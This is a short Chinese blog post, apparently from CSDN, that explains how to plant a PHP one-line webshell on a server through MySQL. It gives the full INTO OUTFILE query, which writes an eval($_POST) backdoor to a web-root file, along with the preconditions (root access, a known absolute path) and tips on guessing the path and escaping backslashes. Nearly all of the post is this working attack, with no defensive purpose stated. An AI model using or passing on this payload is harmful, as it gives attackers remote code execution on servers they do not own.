mysql写入一句话木马

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997829/article/details/81069027

前提:

root权限,知道了服务器的web的绝对路径,尝试写入一句话

mysql查询语句执行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php"

注意事项:

1、绝对路径的猜解

2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.php”(对反斜杠做了一次转义)

展开阅读全文

没有更多推荐了,返回首页